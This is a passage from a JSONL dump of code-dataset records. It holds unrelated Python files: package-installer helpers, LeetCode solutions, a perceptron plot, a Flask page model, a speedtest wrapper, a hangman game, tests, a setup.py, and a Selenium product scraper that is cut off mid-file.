G\n","sub_path":"ROMS/pmacc/tools/post_tools/rompy/tags/rompy-0.1/rompy/load_grid.py","file_name":"load_grid.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"210146268","text":"from __future__ import print_function\nimport os\nimport sys\nfrom subprocess import Popen, PIPE\nfrom classes import run, clear\nfrom collections import Iterable\n\n# Packages to install\nsys_packages = [\n \"nginx\",\n \"postgresql\",\n \"postgresql-server-dev-all\",\n \"python-pip\",\n \"python-virtualenv\",\n \"python3.3-dev\",\n \"sphinxsearch\" # Search engine\n \"uwsgi\",\n \"uwsgi-plugin-python3\",\n]\npip_pkgs = [\n \"South\", # Migrations\n \"beautifulsoup4\", # Html\n \"django\",\n \"fabric\", # Quick deployment\n \"nose\", # Tests\n \"pillow\", # PIL (image manipulation)\n \"psycopg2\", # Postgres binding\n \"python3-memcached\", # Memcache\n \"pytz\", # Time zones\n \"requests\", # GET/POST\n \"uwsgi\", # Backend server\n \"django-nose\", # nose tests\n \"django-hstore\", # PostgreSQL hstore field type\n \"six\", # Python 2/3\n \"tl\",\n \"tl.rename\", # string manipulation\n \"ply\", # to create compilers / parsers\n \"tornado\", # async servers\n #\"bencode\", # Used in .torrent file format\n #\"BitTorrent-bencode\",\n]\n\n\nclass Pkg(object):\n def __init__(self, name):\n #if isinstance(pkgs, str):\n # self.pkgs = [pkgs]\n #else:\n # self.pkgs = pkgs\n self.name = name\n\n def install(self):\n print(\"{}... 
\".format(self.name), end=\"\")\n if self.installed:\n print(\"already installed\")\n else:\n run([\"sudo\", \"apt-get\", \"install\", \"-y\", self.name], out=True)\n print(\"OK\")\n #clear()\n\n @property\n def installed(self):\n p1 = Popen([\"dpkg\", \"-s\", self.name], stdout=PIPE)\n p2 = Popen([\"grep\", \"Status\"], stdin=p1.stdout, stdout=PIPE)\n return b'Status: install ok installed\\n' == p2.communicate()[0]\n\n\nclass PPA(object):\n def __init__(self, name):\n if name.startswith(\"ppa:\"):\n self.name = name[4:]\n else:\n self.name = name\n\n def add(self):\n if not self.added:\n run([\"sudo\", \"add-apt-repository\", \"ppa:\"+self.name], out=True)\n return True\n return False\n\n @property\n def added(self):\n # grep ^ /etc/apt/sources.list /etc/apt/sources.list.d/* | grep fogger\n print(self.name)\n p1 = Popen([\"grep\", \"^\", \"/etc/apt/sources.list\",\n #\"/etc/apt/sources.list.d/*\"\n ], stdout=PIPE)\n p2 = Popen([\"grep\", self.name], stdin=p1.stdout, stdout=PIPE)\n #print(p2.returncode)\n return p2.returncode == 0 or p2.returncode is None\n\n def __str__(self):\n return \"ppa:\"+self.name\n\n\nclass Pip(object):\n def __init__(self, pkgs, env=None):\n self.env = env\n if isinstance(pkgs, str):\n self.pkgs = [pkgs]\n else:\n self.pkgs = pkgs\n\n def install(self):\n pip = \"pip\" if not self.env else os.path.join(self.env, \"bin\", \"pip\")\n for pkg in self.pkgs:\n run([pip, \"install\", pkg])\n clear()\n\n\nclass NPM(object):\n \"\"\"Nodejs packages\"\"\"\n def __init__(self, pkgs):\n #Pkg(\"npm\").install()\n Pkg(\"nodejs\").install()\n if isinstance(pkgs, str):\n self.pkgs = [pkgs]\n else:\n self.pkgs = pkgs\n\n def install(self):\n # npm install -g coffee-script\n for name in self.pkgs:\n if self.installed1(name):\n print(name, \"installed\")\n else:\n run([\"sudo\", \"npm\", \"install\", \"-g\", name])\n\n def installed1(self, name):\n p1 = Popen([\"npm\", \"list\", \"-g\"], stdout=PIPE)\n p2 = Popen([\"grep\", name], stdin=p1.stdout, stdout=PIPE)\n return not b'' == p2.communicate()[0]\n\n\nclass Gem(object):\n \"\"\"Ruby packages\"\"\"\n def __init__(self, pkgs):\n if isinstance(pkgs, str):\n self.pkgs = [pkgs]\n else:\n self.pkgs = pkgs\n\n def install(self):\n for name in self.pkgs:\n if self.installed1(name):\n print(\"gem\", name, \"...\", \"already installed\")\n else:\n run([\"sudo\", \"gem\", \"install\", name])\n\n def installed1(self, name):\n #gem query --name-matches '^sass$' --installed\n p = Popen([\"gem\", \"query\", \"--name-matches\",\n \"^%s$\" % name, \"--installed\"], stdout=PIPE)\n #print(\":\", p.communicate()[0])\n return b'true\\n' == p.communicate()[0]\n","sub_path":"install/packages.py","file_name":"packages.py","file_ext":"py","file_size_in_byte":4582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"135979254","text":"class Solution:\n\tdef canFinish(self, numCourses, prerequisites):\n\t\t\"\"\"\n\t\t:type numCourses: int\n\t\t:type prerequisites: List[List[int]]\n\t\t:rtype: bool\n\t\t\"\"\"\n\n\t\tdic = {}\n\t\tfor i in prerequisites:\n\t\t\tif i[0] not in dic:\n\t\t\t\tdic[i[0]] = []\n\t\t\tdic[i[0]].append(i[1])\n\t\tvisited = []\n\t\tdef dfsWithAncestor(cur, trace):\n\t\t\tif cur in trace:\n\t\t\t\treturn False\n\t\t\tif cur in visited:\n\t\t\t\treturn True\n\t\t\tif cur not in dic:\n\t\t\t\treturn True\n\t\t\tvisited.append(cur)\n\t\t\ta = True\n\t\t\tfor b in dic[cur]:\n\t\t\t\ta = a and dfsWithAncestor(b, trace + [cur])\n\t\t\treturn a\n\t\tdefault = True\n\t\tfor key in 
dic:\n\t\t\tdefault = default and dfsWithAncestor(key, [])\n\t\treturn default\na = Solution()\nprint(a.canFinish(2, [[1,0],[0,1]]))\nprint(a.canFinish(2, [[1,0]]))\nprint(a.canFinish(3, [[1,0],[1,2],[0,1]]))\nprint(a.canFinish(4, [[0,1],[3,1],[1,3],[3,2]]))\nprint(a.canFinish(3, [[0,1],[0,2],[1,2]]))","sub_path":"207.py","file_name":"207.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"373865838","text":"#\r\n# @lc app=leetcode id=590 lang=python\r\n#\r\n# [590] N-ary Tree Postorder Traversal\r\n#\r\n# https://leetcode.com/problems/n-ary-tree-postorder-traversal/description/\r\n#\r\n# algorithms\r\n# Easy (64.37%)\r\n# Total Accepted: 19.6K\r\n# Total Submissions: 30.4K\r\n# Testcase Example: '{\"$id\":\"1\",\"children\":[{\"$id\":\"2\",\"children\":[{\"$id\":\"5\",\"children\":[],\"val\":5},{\"$id\":\"6\",\"children\":[],\"val\":6}],\"val\":3},{\"$id\":\"3\",\"children\":[],\"val\":2},{\"$id\":\"4\",\"children\":[],\"val\":4}],\"val\":1}'\r\n#\r\n# Given an n-ary tree, return the postorder traversal of its nodes' values.\r\n#\r\n# For example, given a 3-ary tree:\r\n#\r\n#\r\n#\r\n#\r\n#\r\n#\r\n#\r\n# Return its postorder traversal as: [5,6,3,2,4,1].\r\n#\r\n#\r\n# Note:\r\n#\r\n# Recursive solution is trivial, could you do it iteratively?\r\n#\r\n#\r\n\"\"\"\r\n# Definition for a Node.\r\nclass Node(object):\r\n def __init__(self, val, children):\r\n self.val = val\r\n self.children = children\r\n\"\"\"\r\n\r\n\r\nclass Solution(object):\r\n def postorder(self, root):\r\n \"\"\"\r\n :type root: Node\r\n :rtype: List[int]\r\n \"\"\"\r\n if not root:\r\n return []\r\n # reinforced morris traverse, reverse of preorder\r\n # add a link from parent's current child's leftmost descendant to parent's previous child\r\n res = []\r\n while root:\r\n res.append(root.val)\r\n if not root.children:\r\n break\r\n else:\r\n for i in range(len(root.children)-1, 0, -1):\r\n curChildLeftMostDescendant = root.children[i]\r\n while curChildLeftMostDescendant.children:\r\n curChildLeftMostDescendant = curChildLeftMostDescendant.children[0]\r\n curChildLeftMostDescendant.children = [\r\n root.children[i - 1]]\r\n root = root.children[-1]\r\n # need to reverse result\r\n return res[::-1]\r\n","sub_path":"Easy/590.n-ary-tree-postorder-traversal.py","file_name":"590.n-ary-tree-postorder-traversal.py","file_ext":"py","file_size_in_byte":1905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"42248286","text":"'''\nCreated on Apr 8, 2013\n\nlinearly separate random points on the plane [-1,1]X[-1,1]\n \n@author: debajyoti\n'''\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n \n#run with more numPoints and less numEpochs for better visualisation \nnumPoints = 10\nnumEpochs = 100\nshowN = 20\naverageIteration = 0\n\n#turn on interactive mode \nplt.ion()\n\n#plot basic axes \nplt.axis([-1, 1, -1, 1])\nplt.axes().set_aspect('equal')\nplt.show()\n \n \n## generate 2 random points to form a line\nlineX = np.random.uniform(-1, 1, 2)\nlineY = np.random.uniform(-1, 1, 2)\n \n\n#form the line using 2-point form method \ndef makeLine(x):\n return lineX[1] + (lineY[1] - lineX[1]) / (lineY[0] - lineX[0]) * ( x - (lineX[0]))\n \n#plot the line, red\nplt.plot( [-1,1],[makeLine(-1),makeLine(1)] ,'b')\n#ax=fig.add_subplot(2,2,1)\n\n#classify as 1 or -1\ndef classifyPoint(point):\n if point[2] > makeLine(point[1]):\n return 1\n else:\n return -1\n \n \n\nepoch = 0\nwhile 
epoch < numEpochs :\n \n ## generate sample points\n points = np.random.uniform(-1,1,(numPoints,2))\n zeros = np.ones( (numPoints,1) )\n points = np.append(zeros, points, axis = 1)\n \n for p in points:\n if classifyPoint(p) == 1:\n if(epoch % showN == 0):\n plt.plot( p[1], p[2], 'bo' )\n else:\n if(epoch % showN == 0):\n plt.plot( p[1], p[2], 'go' )\n \n plt.draw()\n \n #initialize weight vector\n w = np.zeros( 3 )\n \n iteration = 0\n \n done = False\n while not done:\n iteration += 1\n wrongPoints = 0\n print (\"Weights :\" +str(w))\n #check classification of points, update weights for the first one found to be wrong\n for p in points:\n if np.sign( np.dot(w, p) ) != classifyPoint( p ):\n w = np.add( w, classifyPoint( p ) * p ) \n wrongPoints += 1\n break\n if wrongPoints == 0:\n print (\"iterations :\"+str(iteration))\n averageIteration += iteration; \n done = True\n \n \n # drawing every Nth final function\n if(epoch % showN == 0):\n #print(\"epoch :\", str(epoch))\n x = np.array( [-1,1] )\n plt.plot( x, -w[1]/w[2] * x - w[0] / w[2] , 'r' )\n plt.draw()\n \n epoch += 1\n\nprint (\"Average Iteration :\"+ str(averageIteration/numEpochs))","sub_path":"April2013/plaNew.py","file_name":"plaNew.py","file_ext":"py","file_size_in_byte":2368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"639015020","text":"import sys\n\nfrom flask_babel import lazy_gettext as _\nfrom sqlalchemy import event\nfrom typing import Dict, Any, Optional\n\nfrom app import db, get_locale\nfrom app.models.base_model import BaseEntity\n\n\nclass Page(db.Model, BaseEntity):\n __tablename__ = 'page'\n\n path = db.Column(db.String(200), unique=True)\n needs_paid = db.Column(db.Boolean)\n custom_read_permission = db.Column(db.Boolean)\n\n type = db.Column(db.String(256))\n\n def __init__(self, path, type='page'):\n self.path = path.rstrip('/')\n self.type = type\n\n # Store the page's revision class, based upon its type.\n self.revision_cls = self.get_revision_class()\n\n def __repr__(self):\n return '' % (self.id, self.path)\n\n def get_latest_revision(self):\n \"\"\"Get the latest revision of this page.\"\"\"\n revision = self.revision_cls.get_query()\\\n .filter(self.revision_cls.page_id == self.id)\\\n .order_by(self.revision_cls.id.desc())\\\n .first()\n\n return revision\n\n def get_revision_class(self):\n \"\"\"Turn a page's type into a revision class.\"\"\"\n if not self.type:\n return None\n\n class_name = '%sRevision' % (self.type.capitalize())\n try:\n revision_class = getattr(\n sys.modules['app.models.%s' % (self.type)], class_name)\n except AttributeError:\n return None\n\n return revision_class\n\n @staticmethod\n def strip_path(path):\n return path.rstrip('/')\n\n\n@event.listens_for(Page, 'load')\ndef set_revision_class(page, context):\n \"\"\"Calculate revision class.\"\"\"\n page.revision_cls = page.get_revision_class()\n\n\nclass SuperRevision(db.Model, BaseEntity):\n \"\"\"\n Contains all general revision fields, as well as some helper functions.\n\n Any revision class should inherit from this one.\n NOTE: I am not able to get a relationship to work with page here, so you\n will have to implement that yourself.\n \"\"\"\n\n __abstract__ = True\n\n # Things needed in template context.\n context: Dict[str, Any] = {}\n\n nl_title = db.Column(db.String(128))\n en_title = db.Column(db.String(128))\n comment = db.Column(db.String(1024))\n\n def __init__(self, nl_title, en_title, comment):\n self.title = None\n self.nl_title = nl_title\n self.en_title = 
en_title\n self.comment = comment\n\n def get_comparable(self):\n \"\"\"Compare titles, as long as no alternative comparable is given.\"\"\"\n return self.title\n\n @classmethod\n def get_query(cls):\n return cls.query.order_by(cls.id.desc())\n\n\nclass PageRevision(SuperRevision):\n __tablename__ = 'page_revision'\n\n filter_html = db.Column(db.Boolean)\n nl_content = db.Column(db.Text)\n en_content = db.Column(db.Text)\n\n user_id = db.Column(db.Integer, db.ForeignKey('user.id'))\n user = db.relationship('User', backref=db.backref('page_edits',\n lazy='dynamic'))\n\n custom_form_id = db.Column(db.Integer, db.ForeignKey('custom_form.id'))\n custom_form = db.relationship('CustomForm',\n backref=db.backref('page_revision',\n lazy='dynamic'))\n\n page_id = db.Column(db.Integer, db.ForeignKey('page.id'))\n page = db.relationship('Page', backref=db.backref('page_revisions',\n lazy='dynamic',\n cascade='all,delete'))\n\n def __init__(self, page: Optional[Page], nl_title, en_title, comment, user,\n nl_content, en_content, filter_html=True,\n custom_form_id=None) -> None:\n super(PageRevision, self).__init__(nl_title, en_title, comment)\n\n self.page = page\n\n self.filter_html = filter_html\n self.custom_form_id = custom_form_id\n self.content: Optional[str] = None\n self.nl_content = nl_content\n self.en_content = en_content\n self.user_id = user.id if user else None\n\n def get_comparable(self):\n return self.content\n\n\n@event.listens_for(PageRevision, 'load')\ndef set_page_revision_locale(page_rev, context):\n \"\"\"\n Load the correct info in the model.\n\n This function is called after an PageRevision model is filled with data\n from the database, but before is used in all other code.\n\n Use the locale of the current user/client to determine which language to\n display on the whole website. 
If the users locale is unavailable, select\n the alternative language, suffixing the title of the activity with the\n displayed language.\n \"\"\"\n locale = get_locale()\n nl_available = page_rev.nl_title and page_rev.nl_content\n en_available = page_rev.en_title and page_rev.en_content\n if locale == 'nl' and nl_available:\n page_rev.title = page_rev.nl_title\n page_rev.content = page_rev.nl_content\n elif locale == 'en' and en_available:\n page_rev.title = page_rev.en_title\n page_rev.content = page_rev.en_content\n elif nl_available:\n page_rev.title = page_rev.nl_title + \" (\" + _('Dutch') + \")\"\n page_rev.content = page_rev.nl_content\n elif en_available:\n page_rev.title = page_rev.en_title + \" (\" + _('English') + \")\"\n page_rev.content = page_rev.en_content\n else:\n page_rev.title = 'N/A'\n page_rev.content = 'N/A'\n\n\nclass PageReadPermission(db.Model, BaseEntity):\n \"\"\"Contains page group combinations with use custom read permissions.\"\"\"\n\n group_id = db.Column(db.Integer, db.ForeignKey('group.id'))\n group = db.relationship('Group')\n\n page = db.relationship('Page')\n page_id = db.Column(db.Integer, db.ForeignKey('page.id'))\n","sub_path":"app/models/page.py","file_name":"page.py","file_ext":"py","file_size_in_byte":5789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"337103255","text":"import speedtest,time \r\nfrom random import randint\r\nst = speedtest.Speedtest()\r\n\r\ndef getDownloadSpeed():\r\n\tspeed=st.download()\r\n\tspeed=speed/8388608\r\n\treturn [speed,time.time()]\r\n\t\r\n\r\ndef getUploadSpeed():\r\n\tspeed=st.upload()\r\n\tspeed=speed/8388608\r\n\treturn [speed,time.time()]\r\n\r\ndef getPing():\r\n\treturn st.results.ping\r\n\r\n\r\ndef getServer():\r\n\tservernames =[] \r\n\tservers=st.get_servers() \r\n\tprint(\"===Server Info===\")\r\n\tconfig=st.get_config()\r\n\tx=config.get(\"client\")\r\n\treturn x\r\n","sub_path":"Script/speedt.py","file_name":"speedt.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"526211518","text":"import random\nimport string\n\n\"\"\"\nDescription: A simple command line hangman program\nAuthor: Annapoorna Shastry\n\"\"\"\n\ndef loadWords():\n print(\"Loading word list from file...\")\n # inFile: file\n inFile = open(\"H:\\\\hobby_projects\\\\words.txt\", 'r', 0)\n # line: string\n line = inFile.readline()\n # wordlist: list of strings\n wordlist = string.split(line)\n print(\" \", len(wordlist), \"words loaded.\")\n return wordlist\n\ndef chooseWord(wordlist):\n return random.choice(wordlist)\n\ndef getGuessedWord(secretWord, lettersGuessed):\n word = ''\n for char in secretWord:\n if char in lettersGuessed:\n word = word + char\n else:\n word = word + \"_ \"\n return word\n\ndef getAvailableLetters(lettersGuessed):\n s = string.ascii_lowercase\n for char in lettersGuessed:\n if char in s:\n s = s.replace(char, '')\n return s\n \ndef hangman(secretWord):\n print(\"I am thinking of a word that is \" + str(len(secretWord)) + \" letters long.\")\n print(\"-------------\")\n guessesLeft = 8\n count = len(secretWord)\n lettersGuessed = []\n while guessesLeft > 0 and count > 0:\n secret = secretWord\n print(\"You have \" + str(guessesLeft) + \" guesses left.\")\n print(\"Available letters: \" + getAvailableLetters(lettersGuessed))\n guess = input(\"Please guess a letter: \")\n guess = guess.lower()\n if guess.isalpha() and len(guess) == 1:\n if guess in 
lettersGuessed:\n print(\"Oops! You've already guessed that letter: \" + getGuessedWord(secretWord, lettersGuessed))\n print(\"------------\")\n else :\n lettersGuessed.append(guess)\n if guess in secretWord:\n #lettersGuessed.append(guess)\n print(\"Good guess: \" + getGuessedWord(secretWord, lettersGuessed))\n print(\"------------\")\n while secret.find(guess) >= 0:\n count -= 1\n secret = secret[secret.find(guess)+1:]\n else :\n #lettersGuessed.append(guess)\n print(\"Oops! That letter is not in my word: \" + getGuessedWord(secretWord, lettersGuessed))\n guessesLeft -= 1\n print(\"-----------\")\n if guessesLeft == 0:\n print(\"Sorry, you ran out of guesses. The word was \" + secretWord + \" :(\")\n print(\"-----------\")\n print()\n elif count == 0:\n print(\"Congratulations, you won! :D\")\n print(\"-----------\")\n print()\n\nWORDLIST_FILENAME = \"H:\\\\hobby_projects\\\\words.txt\"\nwordlist = loadWords()\n\nprint(\"****** WELCOME TO THE GAME, HANGMAN! ******\")\nwhile True:\n choice = input(\"Please enter 'c' to play/continue and q to quit: \")\n choice = choice.lower()\n if choice == 'c':\n secretWord = chooseWord(wordlist).lower()\n hangman(secretWord)\n elif choice == 'q':\n break\n else:\n print(\"Oops! I didn't get what you said..\")\n","sub_path":"Hangman.py","file_name":"Hangman.py","file_ext":"py","file_size_in_byte":3104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"466761270","text":"# -*- coding: utf-8 -*-\nimport os\nimport codecs\nimport shutil\nimport unittest\nimport tempfile\nimport contextlib\n\nfrom requires_io.main import Config, require_io_re, _to_urls\n\n\nclass Repository(object):\n\n def __init__(self, name):\n self.name = name\n self.root = None\n\n @contextlib.contextmanager\n def context(self):\n tmp = tempfile.mkdtemp()\n try:\n self.root = os.path.join(tmp, self.name)\n yield self\n finally:\n shutil.rmtree(tmp)\n self.root = None\n\n def write(self, filename, content, **kwargs):\n path = os.path.normpath(os.path.join(self.root, filename))\n fld = os.path.dirname(path)\n if not os.path.exists(fld):\n os.makedirs(fld)\n with codecs.open(path, kwargs.pop('mode', 'w'), **kwargs) as fd:\n fd.write(content)\n if kwargs.get('clrf', True):\n if not content.endswith('\\n'):\n fd.write('\\n')\n\n\nclass TestCase(unittest.TestCase):\n\n def assertIsNotNone(self, val): # missing in 2.6\n self.assertTrue(val is not None)\n\n def test_re(self):\n self.assertIsNotNone(require_io_re.search('/foo/bar/setup.py'))\n self.assertIsNotNone(require_io_re.search('/foo/bar/tox.ini'))\n self.assertIsNotNone(require_io_re.search('/foo/bar/buildout.cfg'))\n self.assertIsNotNone(require_io_re.search('/foo/bar/versions.cfg'))\n self.assertIsNotNone(require_io_re.search('/foo/bar/requirements.txt'))\n self.assertIsNotNone(require_io_re.search('/foo/bar/requirements.pip'))\n self.assertIsNotNone(require_io_re.search('/foo/bar/requirements/prod.txt'))\n self.assertIsNotNone(require_io_re.search('/foo/bar/requirements/test.pip'))\n\n def test_to_url(self):\n self.assertEquals([], _to_urls([]))\n self.assertEquals(['setup.py'], _to_urls(['/foo/bar/setup.py']))\n self.assertEquals(\n ['setup.py', 'requirements/prod.txt'],\n _to_urls(['/foo/bar/setup.py', '/foo/bar/requirements/prod.txt']),\n )\n\n def assertPaths(self, repository, paths, raw_paths):\n config = Config({}, raw_paths)\n self.assertEquals(paths, config.paths)\n\n def test_paths(self):\n repository = Repository('foo')\n with repository.context():\n 
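            # context() is a @contextmanager: it creates a fresh temp directory,
            # points self.root inside it for the duration of the with-block, and
            # removes it afterwards, so every test starts from an empty tree.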
repository.write('setup.py', 'hello')\n repository.write('foobar.txt', 'hello')\n self.assertPaths(repository, set([os.path.join(repository.root, 'setup.py')]), [repository.root, ])\n self.assertPaths(\n repository,\n set([os.path.join(repository.root, 'foobar.txt')]),\n [os.path.join(repository.root, '*.txt'), ],\n )\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"requires_io/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"261446284","text":"#! -*- coding: utf-8 -*-\nfrom setuptools import setup, find_packages\nimport sys\nimport pip\n\npython_version = sys.version_info\n\n\n# check required libraries\ndev_extras = ['pyknp']\ndependency_links = ['http://nlp.ist.i.kyoto-u.ac.jp/DLcounter/lime.cgi?down=http://lotus.kuee.kyoto-u.ac.jp/nl-resource/pyknp/pyknp-0.3.tar.gz&name=pyknp-0.3.tar.gz']\n\n# Try to install packages not controlled by pip\nfor package_url in dependency_links: pip.main(['install', package_url])\n\nif python_version >= (3, 0, 0):\n install_requires = ['pypandoc', 'future', 'six', 'mecab-python3', 'jaconv>=0.2', 'pyknp', 'kytea', 'pip>=8.1.0', 'typing']\nelse:\n install_requires = ['pypandoc', 'future', 'six', 'mecab-python', 'jaconv>=0.2', 'pyknp', 'kytea', 'pip>=8.1.0', 'typing']\n\nversion = '1.2.7'\nname = 'JapaneseTokenizer'\nshort_description = '`JapaneseTokenizer` is a package for easy Japanese Tokenization'\n\ntry:\n import pypandoc\n long_description = pypandoc.convert('README.md', 'rst')\nexcept(IOError, ImportError):\n long_description = open('README.md').read()\n\nclassifiers = [\n \"Development Status :: 5 - Production/Stable\",\n \"License :: OSI Approved :: MIT License\",\n \"Programming Language :: Python\",\n \"Natural Language :: Japanese\",\n \"Topic :: Scientific/Engineering :: Artificial Intelligence\",\n \"Programming Language :: Python :: 2.7\",\n \"Programming Language :: Python :: 3.5\"\n ]\n\nsetup(\n author='Kensuke Mitsuzawa',\n author_email='kensuke.mit@gmail.com',\n name = name,\n version=version,\n short_description=short_description,\n long_description=long_description,\n keywords = ['MeCab', '和布蕪', 'Juman',\n 'Japanese morphological analyzer', 'NLP', '形態素解析', '自然言語処理'],\n license = \"MIT\",\n url = \"https://github.com/Kensuke-Mitsuzawa/JapaneseTokenizers\",\n test_suite='test.test_all.suite',\n install_requires = install_requires,\n dependency_links=dependency_links,\n packages=find_packages(),\n extras_require=dict(\n dev=dev_extras,\n )\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"575638954","text":"import random\nimport re\nimport time\nimport bs4\nimport xlrd\nimport pymysql\nfrom selenium import webdriver\nfrom selenium.common.exceptions import NoSuchElementException\n\ndef s(a,b):\n t=random.randint(a,b)\n time.sleep(t)\n\ndef company_info():\n company_name=\"正泰\"\n return company_name\n\n\ndef login_url(uid,pwd):\n driver.find_element_by_css_selector('.login-text.m-top5.act-bg.J_userName').send_keys(uid)\n driver.find_element_by_css_selector('.login-text.m-top5.psw-bg.J_psw').send_keys(pwd)\n driver.find_element_by_css_selector('.login-save.m-top10.ft20.cursor.J_loginIn').click()\n s(3,5)\n\ndef get_main_data_bak(company_name,url):\n J_searchLists=driver.find_elements_by_xpath(\"//div[@class='J_searchList']/ul\")\n for Searchlist in 
J_searchLists:\n img_url=Searchlist.find_element_by_xpath(\"./li[@class='a']/a/img\").get_attribute('src')\n prt_name=Searchlist.find_element_by_xpath(\"./li[@class='b lh tl']/a\").text\n\n prt_url =Searchlist.find_element_by_xpath(\"./li[@class='b lh tl']/a\").get_attribute('href')\n prt_id = prt_url[prt_url.index(\"product/\") + 8:100]\n prt_type=Searchlist.find_elements_by_xpath(\"./li[@class='b lh tl']/div\")[0].text\n order = Searchlist.find_elements_by_xpath(\"./li[@class='b lh tl']/div\")[1].text\n try:\n price=Searchlist.find_element_by_xpath(\"./li[@class='e lh tl']/div[@class='search-active']/span[@class='a']\").text\n except:\n price=\"\"\n try:\n market_price = Searchlist.find_element_by_xpath(\"./li[@class='e lh tl']/div[@class='search-active']/span[@class='b']\").text\n except:\n market_price=\"\"\n stock=Searchlist.find_element_by_xpath(\"./li[@class='f']\").text\n print(img_url,prt_id,prt_name,prt_url,prt_type,order,price,market_price,stock)\n insert_data1(company_name,prt_id,prt_name,prt_url,prt_type,order,price,market_price,stock,url)\n\ndef get_main_data(company_name,table_id):\n page_num=1\n while 1==1:\n J_searchLists = driver.find_elements_by_xpath(\"//div[@class='J_searchList']/ul\")\n for Searchlist in J_searchLists:\n img_url = Searchlist.find_element_by_xpath(\"./li[@class='a']/a/img\").get_attribute('src')\n prt_name = Searchlist.find_element_by_xpath(\"./li[@class='b lh tl']/a\").text\n\n prt_url = Searchlist.find_element_by_xpath(\"./li[@class='b lh tl']/a\").get_attribute('href')\n prt_id = prt_url[prt_url.index(\"product/\") + 8:100]\n prt_type = Searchlist.find_elements_by_xpath(\"./li[@class='b lh tl']/div\")[0].text\n order = Searchlist.find_elements_by_xpath(\"./li[@class='b lh tl']/div\")[1].text\n try:\n price = Searchlist.find_element_by_xpath(\n \"./li[@class='e lh tl']/div[@class='search-active']/span[@class='a']\").text\n except:\n price = \"\"\n try:\n market_price = Searchlist.find_element_by_xpath(\n \"./li[@class='e lh tl']/div[@class='search-active']/span[@class='b']\").text\n except:\n market_price = \"\"\n stock = Searchlist.find_element_by_xpath(\"./li[@class='f']\").text\n #print(img_url, prt_id, prt_name, prt_url, prt_type, order, price, market_price, stock)\n insert_data1(company_name, prt_id, prt_name, prt_url, prt_type, order, price, market_price, stock, table_id)\n\n try:\n page_num += 1\n print(\"翻页-%s\"%str(page_num))\n driver.find_element_by_xpath(\n \"//div[@class='saas-paging J_paging']/a[@class='J_page_turn'][@page-id='\" + str(\n page_num) + \"']\").click()\n s(5,7)\n except NoSuchElementException as e:\n print(e)\n break\n\n\n\n\ndef insert_data1(company_name,prt_id,prt_name,prt_url,prt_type,order,price,market_price,stock,table_id):\n #company_name=company_info()\n db = pymysql.connect(\"localhost\", \"root\", \"123456\", \"vipmro\")\n # 使用 cursor() 方法创建一个游标对象 cursor\n cursor = db.cursor()\n db.set_charset(\"utf8\")\n cursor.execute(\"SET NAMES utf8;\")\n cursor.execute(\"SET CHARACTER SET utf8;\")\n cursor.execute(\"SET character_set_connection=utf8;\")\n\n sql=\"insert into vipmro_net_data (company_name,prt_id,prt_name,prt_url,prt_type,order_,price,market_price,stock,cate_id)\"\\\n \"values('%s','%s','%s','%s','%s','%s','%s','%s','%s','%s')\"\\\n %(company_name,prt_id,prt_name,prt_url,prt_type,order,price,market_price,stock,table_id)\n try:\n # 执行sql语句\n cursor.execute(sql)\n # 提交到数据库执行\n db.commit()\n # print(prt_name+'--------2-finished')\n except Exception as err:\n # 如果发生错误则回滚\n db.rollback()\n 
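        # Roll back the failed INSERT so a single bad row does not leave the
        # connection stuck in a broken transaction for the remaining items.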
print('---------------Error------Message--------:' + str(err))\n # 关闭数据库连接\n db.close()\n\n\ndef next_page(j):\n s(3, 5)\n xpath_data=\"//div[@class='saas-paging J_paging']/a[@class='J_page_turn'][@page-id='\"+str(j+2)+\"']\"\n print(xpath_data)\n driver.find_element_by_xpath(xpath_data).click()\n s(3, 6)\n\ndef get_url_status():\n #company_name=company_info()\n db = pymysql.connect(\"localhost\",\"root\",\"123456\",\"vipmro\",charset=\"utf8\" )\n # 使用 cursor() 方法创建一个游标对象 cursor\n cursor = db.cursor()\n sql=\"select table_id,case when cate_2_url='' then cate_1_url else cate_2_url end as url,company_name from vipmro_net_url where status=0 order by table_id \"\n\n try:\n execute=cursor.execute(sql)\n data=cursor.fetchmany(execute)\n return data\n except Exception as err:\n # 如果发生错误则回滚\n db.rollback()\n print('---------------Error------Message--------:' + str(err))\n # 关闭数据库连接\n db.close()\n cursor.close()\n\ndef update_status_to_run_log(table_id):\n db = pymysql.connect(\"localhost\",\"root\",\"123456\",\"vipmro\",charset=\"utf8\" )\n # 使用 cursor() 方法创建一个游标对象 cursor\n cursor = db.cursor()\n # 使用 execute() 方法执行 SQL 查询\n sql=\"update vipmro_net_url set status=1 where table_id='%s' \" \\\n % (table_id)\n try:\n cursor.execute(sql)\n db.commit()\n except Exception as err:\n db.rollback()\n print('---------------Error------Message--------:'+str(err))\n db.close()\n cursor.close()\n\ndef find_series(num):\n series_names=[]\n series_urls=[]\n series_tmp= driver.find_elements_by_css_selector('.b.p-left10.no-border')\n series_info_div = driver.find_elements_by_css_selector('.b.p-left10.no-border')[num]\n series_info=series_info_div.find_elements_by_tag_name('a')\n print(\"%s个分支\"%str(len(series_info)))\n\n for i in range(len(series_info)):\n series_name=series_info[i].text\n series_url=series_info[i].get_attribute('href')\n #print(series_name,series_url)\n series_names.append(series_name)\n series_urls.append(series_url)\n return series_names,series_urls\n\n\nif __name__==\"__main__\":\n browser = \"Firefox\"\n\n if browser == 